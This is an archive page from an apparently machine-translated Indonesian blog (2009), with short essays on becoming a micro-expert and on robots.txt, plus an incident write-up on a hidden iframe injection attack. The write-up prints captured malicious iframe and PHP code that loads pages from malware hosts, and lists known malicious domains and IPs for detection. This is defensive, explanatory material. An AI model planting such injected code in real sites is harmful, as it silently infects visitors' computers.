Arsip untuk Maret, 2009

Mikro ahli

25 Maret 2009 Diterbitkan oleh Niyaz PK bawah Umum , Google , Internet

Seratus tahun yang lalu jika Anda ingin belajar kalkulus, Anda harus mencari baik buku tentang itu atau orang yang tahu kalkulus.

Lalu internet terjadi.

Sekarang Anda bisa mendapatkan informasi tepi pendarahan pada setiap topik tertentu dari web. Ironisnya, yang menyebabkan masalah informasi yang berlebihan. Tidak ada cara Anda dapat menjadi ahli dalam kalkulus lagi. Ada banyak sekali topik dan sub-topik dalam kalkulus bahwa Anda tidak akan dapat mempelajari semuanya dalam seumur hidup.

Apa yang dapat Anda lakukan adalah menjadi ahli-mikro.

Dua fakta bahwa Anda dapat memanfaatkan untuk keuntungan Anda:

  1. Google membuatnya mudah untuk mendapatkan informasi mengenai setiap topik-sub jelas.
  2. Google membuatnya mudah untuk menemukan ahli pada setiap sub-topik yang diberikan.

Apa artinya ini adalah bahwa Anda bisa menjadi orang di dunia yang paling luas pada setiap topik yang diberikan-mikro.

Bagaimana jika Anda adalah seorang ahli dalam seratus mikro-topik? Bagaimana jika orang mulai datang kembali kepada Anda untuk informasi tentang seratus topik? Bagaimana jika Anda bisa membantu membangun sesuatu di area spesialisasi Anda? Berapa banyak kekuatan yang akan memberi Anda? Berapa banyak Anda bersedia untuk berjuang untuk itu?

Saya kira jawabannya dapat mengubah hidup Anda.

2 tanggapan sejauh

Memperbarui resume

20 Maret 2009 Diterbitkan oleh Niyaz PK bawah Umum

Aku memenangkan tingkat negara peringkat teratas dalam ujian matematika di sekolah.

Aku yg tertangkap akan keluar-penghargaan terbaik siswa di sekolah.

Sekolah. Uh? Setelah beberapa tahun, Anda harus menghapus baris-baris dari resume Anda.

Pastikan Anda memberikan kinerja awesome hari ini sehingga Anda dapat mengganti baris-baris dari masa lalu dengan garis-garis yang sebanding atau bahkan lebih baik dari sekarang.

3 tanggapan sejauh

iframe tersembunyi serangan injeksi

20 Maret 2009 Diterbitkan oleh Niyaz PK bawah Internet , Keamanan

[Diperbarui pada tanggal 27 Oktober 2009 dengan baru versi] script

It is a shame bahwa setelah semua posting tentang keamanan, beberapa website saya diserang hari ini.

Shoban dan Anand diemail saya tentang pagi hari ini (Thanks guys) dan saya mencoba memahami apa yang sedang terjadi. Untuk percaya saya mengucapkan lebih dari 10 website host di server yang sama dipengaruhi oleh serangan itu.

Semua indeks .* file di server terinfeksi dengan sepotong kode yang bisa diisi dengan iframe tersembunyi di halaman.

Untuk halaman html potongan kode berikut telah ditambahkan:

<Iframe src = "http://goooogleadsence.biz/?click=8F9DA" width = 1 height = 1 style = "visibility: hidden; posisi: absolut"> </ iframe>

Untuk php halaman yang ditambahkan:

echo <iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" "width=1 height=1 style=\"visibility:hidden;position:absolute\"> </> iframe";

Asha mengambil upaya dan dibersihkan sebagian besar file yang terinfeksi. Kami sedang memantau status sekarang.

Bagaimana cacing menyuntikkan iframe tersembunyi untuk file saya?

Ada dua cara melalui mana cacing diyakini menginfeksi file Anda:

1) Server dikompromikan

Ini adalah cara yang paling umum. O Beberapa situs-situs yang berada di web server yang sama dengan situs web Anda dapat mempengaruhi (o mungkin beberapa kerentanan dalam aplikasi Web Anda sendiri) yang menyebabkan web server untuk dikompromikan. Setelah server terganggu, worm akan menyebar ke semua situs di server.

2) sisi Klien FTP

Worm yang berada di beberapa / semua PC klien sisi Anda gunakan untuk mengakses ftp / accounts panel kontrol hosting server.

Ketika Anda mengetikkan username dan password untuk ftp / control panel account, worm diam-diam membaca identitasnya, mengakses account ftp Anda dan menginfeksi file-file di server. Ia menambahkan kode yang disebutkan di atas untuk semua indeks .* file.

Bagaimana saya bisa sembuh dari serangan injeksi iframe tersembunyi?

Berikut adalah beberapa tips yang dapat membantu Anda:

  1. Hal pertama yang harus dilakukan untuk mencegah serangan jenis ini adalah mengubah ftp Anda, panel kontrol dan password database sesegera mungkin.
  2. Beritahu web host Anda tentang serangan dan saran mereka untuk mengambil tindakan terhadap kemungkinan serangan server lebar.
  3. Mengubah hak akses file di server Anda ke modus aman maksimum.
  4. Download semua file dari server dan memeriksa infeksi. Bersihkan file yang terinfeksi.
  5. Menggunakan perangkat lunak antivirus yang baik, memindai dan membersihkan setiap PC yang Anda gunakan untuk login ke server hosting Anda.
  6. Jangan gunakan komputer umum untuk mengakses server Anda.

Bagaimana cara membersihkan file yang terinfeksi?

Menggunakan ekspresi reguler untuk mencari semua halaman containig kode berbahaya dan menggantinya dengan ruang:

<iframe src=\"http://[^"]*" width=1 height=1 style=\"visibility:hidden;position:absolute\"> </> iframe

echo \ "src=\\\"http://[^"]*\" <iframe width=1 height=1 style=\\\"visibility:hidden;position:absolute\\\"> </> iframe \ ";

Anda mungkin harus membuat script yang mengotomatisasi ini untuk semua file di server.

Aku telah dimasak sampai script php yang dapat membantu Anda menemukan file yang terinfeksi. Download file dari sini , simpan sebagai clean.php (saat ini clean.php.txt) dan meng-upload ke root folder dari situs Anda.

Anda mungkin ingin mengubah beberapa nilai hardcoded di dalam file.

Kemudian kunjungi url:

http://www.yourdomain.com/clean.php?c=iframe

C menentukan parameter teks untuk mencari di dalam file. Hasilnya akan menjadi sesuatu seperti:

Clean hidden iframes

Ini akan mencari semua file dalam situs web Anda dan jika ada file yang berisi string yang diberikan, akan mencetak nama file bersama dengan jumlah kejadian tali. Pada gambar di atas, Anda dapat melihat bahwa satu file yang terinfeksi.

Perhatikan bahwa script tidak akan menghapus iframe dari file Anda. pembersihan otomatis bisa mematahkan beberapa situs Anda. Jadi seperti yang sekarang Anda harus membersihkan file secara manual.

Faiz telah menulis skrip ASP.Net maju untuk menemukan file yang terinfeksi, dan dapat ditemukan di sini .

Apakah peringkat mesin pencari saya akan terpengaruh oleh serangan ini?

Cobalah untuk menjadi cepat dengan langkah-langkah karena jika pengunjung melihat pesan "Situs ini mungkin berbahaya bagi komputer Anda" pop up ketika (s) ia mencoba mengakses situs / blog, (s) ia tidak dapat kembali lagi. Ingat bahwa jika keamanan situs Web Anda terganggu, hal itu dapat mempengaruhi peringkat mesin pencari situs web. Selain itu dapat membuka jalan untuk serangan yang lebih canggih.

Google akan menandai situs Anda dalam hasil pencarian itu dengan peringatan: "Situs ini mungkin berbahaya bagi komputer Anda".

Gunakan link berikut untuk melihat apa google berpikir tentang situs web Anda (memberi url situs anda, bukan shopfloorbd.co.uk):

http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk

Sebagaimana disebutkan di atas, Anda harus menghapus malware dari komputer lokal Anda menggunakan beberapa perangkat lunak antivirus. AVG melihatnya sebagai "Trojan Horse Downloader" dan NOD32 melihatnya sebagai "JS / trojan Kryptik.B".

Perhatikan bahwa ketika mengunjungi situs yang terinfeksi, beberapa software antivirus meminta Anda bahwa "Trojan Horse Downloader", sebuah file exe-sedang mencoba untuk di-load. Setelah exe menginfeksi komputer anda, akan menginfeksi server Anda juga.

Berikut adalah beberapa contoh kode lebih ditangkap dari alam:

<iframe src="http://hostverify.net/?click=2730375" width=1 height=1 style="visibility:hidden;position:absolute"> </> iframe

<iframe src="http://hosttracker.net/?click=32431937" width=1 height=1 style="visibility:hidden;position:absolute">

Ada dikaburkan versi kode serangan juga:

<script> fungsi c102916999516l4956a7e7c979e (l4956a7e7c9b86) (... dll

Berikut ini adalah daftar beberapa website lain yang host konten berbahaya:

gumblar.cn

martuz.cn

beladen.net

38zu.cn

googleanalytlcs.net

lousecn.cn

fqwerz.cn

d99q.cn

orgsite.info

94.247.2.0

94.247.2.195

http://mmsreader.com

http://google-ana1yticz.com

http://my2.mobilesect.info

http://thedeadpit.com

http://internetcountercheck.com

http://165.194.30.123

http://ruoo.info

gogo2me.net /

http://live-counter.net

http://klinoneshoes.info

perlindungan-livescan.com /

http://webexperience13.com

http://q5x.ru

http://q5x.ru
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net /
http://live-counter.net
http://klinoneshoes.info
perlindungan-livescan.com /
http://webexperience13.com
http://q5x.ru

Jika Anda menemukan url ini di kode dalam situs web Anda, itu adalah tanda ditembak yakin bahwa Anda terinfeksi.

76 tanggapan sejauh

Keaslian

18 Maret 2009 Diterbitkan oleh Niyaz PK bawah Umum

Dua dari teman-teman saya kehilangan pekerjaan mereka kemarin Banyak orang. Datang untuk melihat mereka / memanggil mereka.

Ada yang seperti "Kapan saya akan kehilangan pekerjaan saya?"

dan beberapa seperti "Kapan saya akan kehilangan pekerjaan saya?"

Kedua kalimat suara dan mantra yang sama, tapi arti mereka adalah dunia yang terpisah.

Jika sesuatu yang buruk terjadi pada teman Anda, Anda dapat khawatir tentang hal yang sama terjadi pada Anda, atau Anda dapat berpikir tentang hari, Anda dapat bergabung dengan teman Anda.

Apa pun, jangan mencoba untuk hubungan palsu Anda - Anda tidak akan pernah berhasil.

4 tanggapan sejauh

Bagaimana bisa bypass robots.txt crawler?

16 Maret 2009 Diterbitkan oleh Niyaz PK bawah Internet , Keamanan

Ketika saya menulis bahwa robots.txt tidak akan mencegah crawler buruk dari mengakses data pribadi Anda , pembaca bertanya-tanya bagaimana crawler dapat bypass robots.txt.

Saya pikir artikel asli cukup jelas. Pokoknya saya akan coba lagi:

Bayangkan sebuah tanda yang mengatakan "penyusup akan dituntut". Tanda itu hanya memberitahu Anda bahwa Anda tidak diharapkan untuk penebus salah. Setelah membaca tulisan itu, Anda harus membuat pikiran Anda apakah karena salah atau tidak. Tanda itu sendiri tidak akan menghentikan Anda dari meneruskan lebih lanjut. Ini hanya akan memberitahu Anda bahwa Anda tidak seharusnya.

Demikian pula, robots.txt hanya menceritakan crawler bahwa mereka tidak diharapkan untuk mengunjungi beberapa halaman. Jika crawler menginginkan, masih bisa mengunjungi halaman tersebut. Ini berarti bahwa bot buruk bisa membaca file robots.txt dan belajar yang file pengguna ingin tetap swasta dan membaca file-file untuk mencari data rahasia.

Apa dasarnya ini berarti bahwa ketika mereka membaca tulisan Anda, orang-orang yang baik akan berhenti. Yang buruk tidak akan. Jadi, jika Anda benar-benar ingin menghentikan semua orang dari pelanggaran, cobalah membangun dinding di sekitar kompleks anda daripada menggunakan tanda.

Jadi Bagaimana bypass robots.txt crawler?

crawler A perlu melakukan apa-apa untuk memotong robots.txt. Sebaliknya, crawler harus melakukan pekerjaan tambahan jika ingin mengikuti aturan-aturan dalam robots.txt.

6 tanggapan sejauh